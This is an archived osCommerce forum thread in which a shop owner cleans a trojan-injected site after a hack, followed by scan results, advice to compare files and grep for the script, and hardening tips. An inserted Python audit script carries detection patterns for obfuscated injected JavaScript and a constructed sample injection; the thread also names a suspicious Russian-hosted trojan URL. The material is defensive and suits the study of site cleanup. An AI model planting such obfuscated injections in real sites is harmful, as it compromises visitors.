saadmubeen, posted April 10, 2010

Trojan on my site detected by some people. This is from another forum:

"Saad your site is popping up as a potential threat for people using Avast (including myself). It says the site has a trojan."

How to remove it? Please help... I am so much tense because of this problem.....

[ Recently I got hacked by someone and he removed my admin folder of the oscommerce website ]

saadmubeen (Author), posted April 10, 2010

> Trojan on my site detected by some people. This is from another forum:
>
> "Saad your site is popping up as a potential threat for people using Avast (including myself). It says the site has a trojan."
>
> How to remove it? Please help... I am so much tense because of this problem.....
>
> [ Recently I got hacked by someone and he removed my admin folder of the oscommerce website ]

ifeng-com.citibank.com.tripadvisor-com.needserver.ru.8080/ganj.com/google.com/angege.com/kijiji.ca.php is the trojan detected on my site... Please help.. I am a newbie.. Please provide a simple solution

Guest, posted April 11, 2010

You are going to have to identify the files affected or more precisely the error on your site.

If your site has been identified by an individual and listed by Google, then you should contact Google to have your site removed from the 'black' list.

Chris

saadmubeen (Author), posted April 11, 2010

> You are going to have to identify the files affected or more precisely the error on your site.
>
> If your site has been identified by an individual and listed by Google, then you should contact Google to have your site removed from the 'black' list.
>
> Chris

When I open the admin panel of oscommerce I get a pop-up message from AVG antivirus of that trojan.... A few days back I ignored it when I log on to my cpanel account same thing appeared so many times (warning about the trojan)...

Guest, posted April 11, 2010

> Trojan on my site detected by some people. This is from another forum:
>
> "Saad your site is popping up as a potential threat for people using Avast (including myself). It says the site has a trojan."
>
> How to remove it? Please help... I am so much tense because of this problem.....
>
> [ Recently I got hacked by someone and he removed my admin folder of the oscommerce website ]

You can try to scan your site with this contribution, osCommerce VTS, to see if it finds infected files...

saadmubeen (Author), posted April 11, 2010

> You can try to scan your site with this contribution, osCommerce VTS, to see if it finds infected files...

Your Suggested Contribution found the following results

Scan Completed
osCommerce Virus & Threat Scan v1.0.3
Scan root: /home/saadstor/public_html
Threats Definitions: 271
Files Definitions: 16
Scanned folders: 497
Scanned files: 755
Possible Infected files: 17
Possible Threat files: 0

Possible Infection: /home/saadstor/public_html/htaccess_protection.htm (User Agent <=> EmailSiphon )
Possible Infection: /home/saadstor/public_html/htaccess_protection.htm (User Agent <=> EmailWolf )
Possible Infection: /home/saadstor/public_html/htaccess_protection.htm (User Agent <=> ExtractorPro )
Possible Infection: /home/saadstor/public_html/htaccess_protection.htm (User Agent <=> CherryPicker )
Possible Infection: /home/saadstor/public_html/htaccess_protection.htm (User Agent <=> NICErsPRO )
Possible Infection: /home/saadstor/public_html/htaccess_protection.htm (User Agent <=> Teleport )
Possible Infection: /home/saadstor/public_html/htaccess_protection.htm (User Agent <=> EmailCollector )
Possible Infection: /home/saadstor/public_html/plusjonestikka/includes/functions/sitemonitor_functions.php (Known automated hack <=> iframe)
Possible Infection: /home/saadstor/public_html/plusjonestikka/includes/functions/sitemonitor_functions.php (Known automated hack <=> error_reporting(0) )
Possible Infection: /home/saadstor/public_html/.htaccess (User Agent <=> EmailSiphon )
Possible Infection: /home/saadstor/public_html/.htaccess (User Agent <=> EmailWolf )
Possible Infection: /home/saadstor/public_html/.htaccess (User Agent <=> ExtractorPro )
Possible Infection: /home/saadstor/public_html/.htaccess (User Agent <=> CherryPicker )
Possible Infection: /home/saadstor/public_html/.htaccess (User Agent <=> NICErsPRO )
Possible Infection: /home/saadstor/public_html/.htaccess (User Agent <=> Teleport )
Possible Infection: /home/saadstor/public_html/.htaccess (User Agent <=> EmailCollector )
Possible Infection: /home/saadstor/public_html/phpThumb/demo/phpThumb.demo.showpic.php (Known automated hack <=> iframe)

I have found this script in some of my files...

I have removed this script from them...but the script is still there...........I am very tense...my alexa rank is increasing...everything will be destroyed!!!

Guest, posted April 11, 2010

> Possible Infection: /home/saadstor/public_html/htaccess_protection.htm (User Agent <=> EmailSiphon )
> Possible Infection: /home/saadstor/public_html/htaccess_protection.htm (User Agent <=> EmailWolf )
> Possible Infection: /home/saadstor/public_html/htaccess_protection.htm (User Agent <=> ExtractorPro )
> Possible Infection: /home/saadstor/public_html/htaccess_protection.htm (User Agent <=> CherryPicker )
> Possible Infection: /home/saadstor/public_html/htaccess_protection.htm (User Agent <=> NICErsPRO )
> Possible Infection: /home/saadstor/public_html/htaccess_protection.htm (User Agent <=> Teleport )
> Possible Infection: /home/saadstor/public_html/htaccess_protection.htm (User Agent <=> EmailCollector )

This file I don't know since I don't have it in my shop. Do you know this file, and should it be there? If yes, compare it with your original file..

> Possible Infection: /home/saadstor/public_html/plusjonestikka/includes/functions/sitemonitor_functions.php (Known automated hack <=> iframe)
> Possible Infection: /home/saadstor/public_html/plusjonestikka/includes/functions/sitemonitor_functions.php (Known automated hack <=> error_reporting(0) )

These two files give me the same error, no problem..

> Possible Infection: /home/saadstor/public_html/.htaccess (User Agent <=> EmailSiphon )
> Possible Infection: /home/saadstor/public_html/.htaccess (User Agent <=> EmailWolf )
> Possible Infection: /home/saadstor/public_html/.htaccess (User Agent <=> ExtractorPro )
> Possible Infection: /home/saadstor/public_html/.htaccess (User Agent <=> CherryPicker )
> Possible Infection: /home/saadstor/public_html/.htaccess (User Agent <=> NICErsPRO )
> Possible Infection: /home/saadstor/public_html/.htaccess (User Agent <=> Teleport )
> Possible Infection: /home/saadstor/public_html/.htaccess (User Agent <=> EmailCollector )

You should compare your original .htaccess file with this. I don't know what you have in it...

> Possible Infection: /home/saadstor/public_html/phpThumb/demo/phpThumb.demo.showpic.php (Known automated hack <=> iframe)

This one you should also compare with the original one..

> I have found this script in some of my files...
>
> I have removed this script from them...but the script is still there...........

You can use Windows Grep to find this script in your files: Windows Grep

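Added example (not part of the original thread and not code from osCommerce VTS): the reply above advises comparing flagged files with the originals and searching every file for the injected script. This Python script does both against a known-clean copy of the site; the marker patterns, directory names and sample files are constructed assumptions, not a complete signature set.

```python
import re
import tempfile
from pathlib import Path

# Heuristic markers for obfuscated script injection (assumed patterns):
# a long percent-encoded string fed to unescape(), or a long run of \xNN escapes.
MARKERS = {
    "unescape-percent-run": re.compile(rb"unescape\(\s*[\"'](?:%[0-9a-fA-F]{2}){8,}"),
    "hex-escape-run": re.compile(rb"(?:\\x[0-9a-fA-F]{2}){8,}"),
}

def _files(root):
    """Map each file's path relative to root onto its raw bytes."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): p.read_bytes()
            for p in root.rglob("*") if p.is_file()}

def audit(live_root, clean_root):
    """Return {relative path: (status, [marker names])} for every file that is
    added, modified or missing versus the clean copy, or that matches a marker."""
    live, clean = _files(live_root), _files(clean_root)
    findings = {}
    for rel, data in sorted(live.items()):
        if rel not in clean:
            status = "added"        # not in the backup: possible dropped file
        elif data != clean[rel]:
            status = "modified"     # differs from the backup: possible injection
        else:
            status = "unchanged"
        hits = sorted(name for name, rx in MARKERS.items() if rx.search(data))
        if status != "unchanged" or hits:
            findings[rel] = (status, hits)
    for rel in sorted(set(clean) - set(live)):
        findings[rel] = ("missing", [])   # e.g. a deleted admin file
    return findings

def demo():
    """Build a constructed clean/live pair in a temp directory and audit it."""
    # Constructed sample; the encoded string decodes to "http://example".
    injected = b'<script>var T=unescape("%68%74%74%70%3a%2f%2f%65%78%61%6d%70%6c%65");</script>'
    with tempfile.TemporaryDirectory() as tmp:
        clean, live = Path(tmp, "clean"), Path(tmp, "live")
        for root in (clean, live):
            (root / "admin").mkdir(parents=True)
            (root / "index.php").write_bytes(b"<?php echo 'shop'; ?>")
            (root / "admin" / "login.php").write_bytes(b"<?php /* login */ ?>")
        (live / "index.php").write_bytes(b"<?php echo 'shop'; ?>" + injected)
        (live / "admin" / "login.php").unlink()
        (live / "new.php").write_bytes(b"<?php /* not in backup */ ?>")
        return audit(live, clean)

if __name__ == "__main__":
    for rel, (status, hits) in demo().items():
        print(f"{status:9} {rel} {', '.join(hits)}")
```

On a real site, call `audit()` with a downloaded copy of the web root and an unpacked backup or fresh osCommerce package; files reported as "added" have no original to compare against and need manual review.
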
saadmubeen (Author), posted April 11, 2010

> This file I don't know since I don't have it in my shop. Do you know this file, and should it be there? If yes, compare it with your original file..
>
> These two files give me the same error, no problem..
>
> You should compare your original .htaccess file with this. I don't know what you have in it...
>
> This one you should also compare with the original one..
>
> You can use Windows Grep to find this script in your files: Windows Grep

Thanks man... By using Windows Grep I have removed the script.. and now my website is again working...

Mort-lemur, posted April 12, 2010

Hi,

Glad your site is working again, but:

1) Are you up to date with all the security fixes and add-ons - if not then do it now.
2) Have you now changed the name of your admin folder and passwords following the problem (you posted the name of your admin folder in the scan results above - change it now!)
3) Are you making regular backups of your site so you can wipe site and restore with a clean version if it happens again.
4) Do you run an anti-virus software on your PC + a firewall?

Thanks

Now running on a fully modded, Mobile Friendly 2.3.4 Store with the Excellent MTS installed - See my profile for the mods installed ..... So much thanks for all the help given along the way by forum members.

saadmubeen (Author), posted April 13, 2010

> Hi,
>
> Glad your site is working again, but:
>
> 1) Are you up to date with all the security fixes and add-ons - if not then do it now.
> 2) Have you now changed the name of your admin folder and passwords following the problem (you posted the name of your admin folder in the scan results above - change it now!)
> 3) Are you making regular backups of your site so you can wipe site and restore with a clean version if it happens again.
> 4) Do you run an anti-virus software on your PC + a firewall?
>
> Thanks

Thank you so much man... I have installed all the contributions mentioned in the pinned thread... and also changed my admin folder name... I constantly make backups of my site.... and I also have an antivirus+firewall on my pc...

Any other security contribution you may suggest will also be greatly appreciated....

Regards
Saad

sky_diver, posted April 14, 2010

> Any other security contribution you may suggest will also be greatly appreciated....
>
> Regards
> Saad

I just released this http://addons.oscommerce.com/info/7334 . Hope it can help you stay secure.

Archived
This topic is now archived and is closed to further replies.